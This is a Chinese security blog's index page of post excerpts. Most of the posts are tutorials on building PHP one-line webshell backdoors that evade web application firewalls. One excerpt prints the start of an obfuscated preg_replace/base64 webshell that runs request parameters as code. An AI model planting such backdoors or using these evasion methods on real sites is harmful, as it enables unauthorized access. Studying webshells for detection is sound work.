渗透教程

php一句话后门过狗姿势万千之理论篇【一】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com 写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网…继续阅读 »
乌云drops

博客已集成乌云drops与zone精华,支持全文检索,将永久保存。

乌云已死,但是给我们留下的文章成果是值得持续去学习的。 所以我已经把网上流传的1156篇乌云droops导入至博客中,大家如需查找相关文章可以直接使用博客搜索功能,支持全文检索。 另外,博客页面支持手机自适应。 后期我会把文章中所有/wp-content/uploads/链接全部保存至本服务器上,以防…继续阅读 »
网络运维

vmware中linux系统误删除文件恢复神器【包括xfs】

linux中rm -rf xxx后一秒发现删除文件,那一刻是崩溃的,别问我今天经历了写什么,就是搞事情!!! 一般linux中可用的恢复软件是不多的,一开始我试了testdisk,但是苦于文件格式是xfs的,竟然不支持。 下载地址:http://www.cgsecurity.org/wiki/TestDisk_Download   然后想到vmware应该有单独的工具…继续阅读 »
渗透教程

浅析一句话后门中eval与assert执行条件与原理

eval与assert都算是元老级一句话后门函数,其实很多情形下代码的执行还是需要依靠eval去执行,只是前锋路转了而已。 eval与assert函数的用法大家可以自行百度。 eval与assert区别 eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: assert(phpinfo()) assert(eval('ec…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之后门构造与隐藏【二】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com 第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。   另外强调一下,这篇…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之传输层加工【三】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/442.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com   既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回…继续阅读 »
这就是生活

论IT汪双十一剁手的正确姿势

双十一,没什么好说的,对这个具有中国现代主义特色的节日,可以总结为三个字,买买买。 对于双十一的商业与经济角度,不再做评价,知乎上的回答更有深度。 毕竟我只是一个平民,讨论那些个经济事态,国际化双十一,跟我有个什么卵关系(马云爸爸曾经也说过类似的大实话) 那么作为I…继续阅读 »
渗透工具 渗透教程

php一句话后门过5大WAF无压力[安全狗+360网站卫士+护卫神+D盾]

最近研究过狗一句话有点走火入魔,目前研究了几个版本的一句话,效果都还不错。 授之于鱼不如授之以渔,过几天准备从理论层,代码层,传输层写个过狗连载教程。 目前我使用的是cknife软件,类似于菜刀的开源软件,虽然还有不少bug,但高度自由修改,不用担心后门。我之所以没有用菜刀,…继续阅读 »
渗透教程

php一句话后门的几种变形分析[preg_replace函数]

今天偶然在土司看到一篇关于php后门的问题,让我联想到以前遇到过的一个一句话,共同点都是利用preg_replace中/e 修正符使replacement 参数当作 PHP 代码来执行。 先来看下原版代码 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…继续阅读 »
网络运维

Connectify Dispatch指定程序使用指定网卡[运维神器]

很多时候,在进行内网维护的时候我们同时需要使用外网,但是当外网与内网同时使用的时候,除非程序已经建立稳定连接,否则新的网络连接肯定会不如愿,比如当你ping一个ip的时候到底走的哪个网卡呢? 这时候就需要一个软件来分配网卡,而这个工具我几年前在学校的时候经常用,却没想到现在…继续阅读 »
网络运维

win10子系统ubuntu linux暴力修改root用户密码

今天体验了把win10子系统的ubuntu系统,感觉还不错,安装与使用教程就不用多提了,网上有一大把总体比较简单。 但是就在让我初始化用户的时候我手贱输了一个非root用户,导致没法切换root用户,百度了下网上也没有相关的讨论。   索性直接来硬的喽, 修改shadow文件 既然linux是windows的…继续阅读 »